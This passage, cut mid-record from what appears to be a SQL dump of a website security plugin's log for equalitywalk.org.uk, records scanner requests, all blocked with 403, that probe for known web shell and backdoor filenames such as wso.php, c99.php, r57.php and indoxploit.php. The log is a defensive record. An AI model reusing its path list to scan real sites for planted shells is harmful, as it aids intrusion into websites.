error.php','','{\"1\":\"python-requests\\/2.27.1\"}','a5d7T0crBPbul4WS6tNZxoUQ',0,1674721378.8307,156,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/atomic/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','uSHAlO7Wtzwg1kFhRXBVTiYI',0,1674721379.6522,124,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/templates/atomic/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','MPLXmip023aFqkvKNnl51HjW',0,1674721380.7034,121,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','zNPqFAD1SvTdxZmMeRylOJkB',0,1674721382.1193,83,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','nigsaKEcqBpYh6kmtSNr1zye',0,1674721382.9368,94,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','Becbs5dkEg8XxGUAFwjK2ORH',0,1674721386.0885,94,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','b15otYanuqAWJC6icRezP38K',0,1674721387.3595,90,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','ftwJgMqz0FpX8xUQLYnmyOjl',0,1674721404.1267,100,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','9xSoR5gACcpnN23EYej4sOJv',0,1674721406.0000,159,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','U9l4NvELC0RuDMydF1qmpfwW',0,1674721406.9881,95,'','GET',403,0,700,0,1,'',0),('104.243.43.65',1760766785,'','https://equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','j2RQE5p7x8NDg0wdOmknAiq1',0,1674731621.4501,115,'','POST',403,0,700,0,1,'',0),('104.243.43.65',1760766785,'','https://equalitywalk.org.uk/cemgllxt.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','R79snz6LlNw3GAeqamX1WBPE',0,1674731621.6461,101,'','GET',403,0,700,0,1,'',0),('104.243.43.65',1760766785,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','w1GkJ49sMK7oFlr3bpgTQ5zS',0,1674731622.1501,195,'','GET',403,0,700,0,1,'',0),('104.243.43.65',1760766785,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','0gZ63yV8Pn9cQGdS1JzvMUHI',0,1674731622.5278,101,'','GET',403,0,700,0,1,'',0),('109.248.175.137',1845014409,'','https://www.equalitywalk.org.uk/ss.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','O3wDKUuBZk5MGgXH9Joyvb0W',0,1674735547.8104,122,'','GET',403,0,700,0,1,'',0),('109.248.175.137',1845014409,'','https://www.equalitywalk.org.uk/v33.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','fpMcNUQOJubl8WivrEjKC0mw',0,1674752211.7905,143,'','GET',403,0,700,0,1,'',0),('147.78.47.230',2471374822,'','https://equalitywalk.org.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.82 Safari\\/537.36\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-reset.php\"}','AJlIYnHiDhN4zqdZe7tGk5Tj',0,1674773645.0910,125,'','GET',403,0,700,0,1,'',0),('62.151.177.83',1050128723,'','https://www.equalitywalk.org.uk/wso112233.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NjcDs1lwk2J7SmaxqFAvRu49',0,1674795185.8599,257,'','GET',403,0,700,0,1,'',0),('62.151.177.83',1050128723,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','dMGJsPqVctYSC9fB6xl70gn3',0,1674795199.8871,114,'','GET',403,0,700,0,1,'',0),('62.151.177.83',1050128723,'','https://www.equalitywalk.org.uk/xleet-shell.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','wle3WITghGp256j4ZmCAtD0f',0,1674795255.2224,147,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/installer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','Cpq4n6lxvbTfHLcdVoW23I8h',0,1674797520.1085,430,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-admin/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5MWJ82kjCDeBsuU09pVqnct1',0,1674798035.3707,116,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','h31TjGNtoYrURv2MseaxpJw9',0,1674798040.2436,107,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/1h6j5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AbZh6WK05cU1FBNLOHtPlroQ',0,1674798069.8428,128,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ucQ5yrBe243MGtA1osfvVORS',0,1674798073.2564,110,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-22.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','K4sUo2RnLW5SZM7PdOI8qGmw',0,1674798076.3726,127,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9jVcXv3CtIoxqlTksEK14fDF',0,1674798079.1088,99,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QksV4dgeIbMSv3yYj5OGoqrB',0,1674798080.0591,96,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/idx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','M1Ne5p0vwhz3VRrs4lxPnZQc',0,1674798081.0989,159,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/evil.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','revyXqfROF8tAmlacCbDZup7',0,1674798082.0596,100,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PyI1jB4sGfRaiwZMnqlTcdkA',0,1674798084.1818,92,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','51hBRjdXOfbqQ0ownZ7MKuHs',0,1674798085.1507,116,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fbVleAOnmdBYicDjo4Caw0yS',0,1674798086.1791,98,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/Priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','m1OEDqg6X8Abzv4ZGWKPkrQV',0,1674798087.0109,121,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gBKdlvTjnrQb7Eik2af3Fs5S',0,1674798087.9989,110,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/Priv.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ma486fUOGeQqXDgNZCMPRWcw',0,1674798089.0313,124,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x0U2iBSYpTKmQjgkLXCPdW9D',0,1674798090.0386,89,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ojvrdFs301ZUAwm9XBTlu5iz',0,1674798090.9887,107,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mXEtxg1qdKJnaIh7v0Cl42ij',0,1674798091.7372,97,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-text/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oTAzBZGlwb7fMxL8amtyRqPu',0,1674798092.5485,108,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-text/themes/seotheme/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3LnRZGxNTj19mBgoWh0vIQ54',0,1674798094.2806,125,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/r57.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dRPj0um1Q2hJnNXkHEC83ScD',0,1674798095.0489,103,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/c100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Wlv1U7SfjsDcQeompLVCIEnR',0,1674798095.7892,101,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/sniper.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','s428LPiJuAVg69WmHZpyTQre',0,1674798096.5392,96,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','P3ujBLKHSyosAZMJpwqbezD0',0,1674798097.5286,93,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','P1VsEpOHdc4Jj3nu59iNyUef',0,1674798098.2447,101,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YWSgKaTLG3VDohR05sft6Z49',0,1674798098.9682,98,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/1975.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IMWobXQ9DGHkJK02fO57pCNE',0,1674798099.6919,92,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-2019.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RZcnXkV6MiTYP3E9I4xsSJpD',0,1674798100.3918,107,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/h4xor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','D5I0fWpGFu8kyzjmYHcEQRNi',0,1674798101.0775,87,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wso24.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hD9npAqKcUrBxsaoz2J0XL8E',0,1674798101.7661,111,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0Tpfk5rNAlQX6MweWotnSdCJ',0,1674798102.6180,97,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/ae.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5bTIGXitqW9U8nDgjrK3pFHE',0,1674798103.5388,93,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LEakbuBNTXA4C18ZQdHM7D9J',0,1674798104.3248,98,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YqA3HT0aGUZeQRLObW4d6g5j',0,1674798105.1027,130,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WVLuKPy4XQwZErtFb3jvc0sk',0,1674798105.8610,125,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qwcGTrkdx8RnbHhjKMaQDVAs',0,1674798106.5862,98,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AY3mPkU1Wt6xEHsLKMhzpivG',0,1674798107.3091,97,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/cpanel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vUVkCApog5PM4i3sGfYZRBd8',0,1674798108.1875,102,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-text/fr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ODRWGkr5ATy6dlvFCPm4bjsf',0,1674798109.0870,110,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7lPyTS2tJY0UVnjMLahg5Bok',0,1674798109.8281,124,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/mm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lM4VB2TPvt8KrnsRk0xUNJGa',0,1674798110.5067,126,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/blok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZE9Pc0CzKVnaokqR6flxFp4W',0,1674798111.2297,112,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/images/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sm3TkCI4zLjhVDZxM9piSuER',0,1674798112.0231,97,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-admin/user/include.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','L1iaH4R0q2fo9pZEN86VIze3',0,1674798112.8076,113,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-text/languages/plugins/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','a1DZcni8qNJ5RWzemhfABory',0,1674798113.5605,108,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/modules/logo_img.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','v2O1Su84AY6jCgmicJIV3LMa',0,1674798114.4372,112,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/shells.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PaoGgY29hEHROwtmx8qbTlQV',0,1674798115.5239,117,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x7Iulif2yV64GocvwrgKj5Jb',0,1674798116.2171,111,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/oc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','THoUBkXyw8RLOted6n42QK7j',0,1674798117.0079,115,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dur8hnQoAilqDCgS6peKR4Im',0,1674798117.7294,104,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RNEMd4mbgDPkezSvVq0wHBri',0,1674798118.4191,138,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zLR1B4e38NMWKc7pGSbrvnPO',0,1674798119.1359,97,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Gsc8mjf9klFNQbzXYqgWAZH6',0,1674798119.8671,102,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KhTZ235wOYkr9jIvBVExW6cG',0,1674798120.6295,93,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','g7JxvR3TFVtHwnEoc2LQhNBk',0,1674798121.2756,90,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','K86o1CsvjBPxzYhGkRe2Htgr',0,1674798121.9806,98,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sfSazmYpxKuqcIgbCh4Ty7DW',0,1674798122.6593,95,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JKPp3GYs1yUnm20o5XDL6SRk',0,1674798123.4713,93,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','de1rO2CJT9DnpqPB7LXuiVt4',0,1674798125.0288,98,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pMVGfLB16e4i5rcI82jyJHkt',0,1674798126.0940,116,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','H2S5ej4mVzfgJoAOuyTN718P',0,1674798126.8129,94,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.equalitywalk.org.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 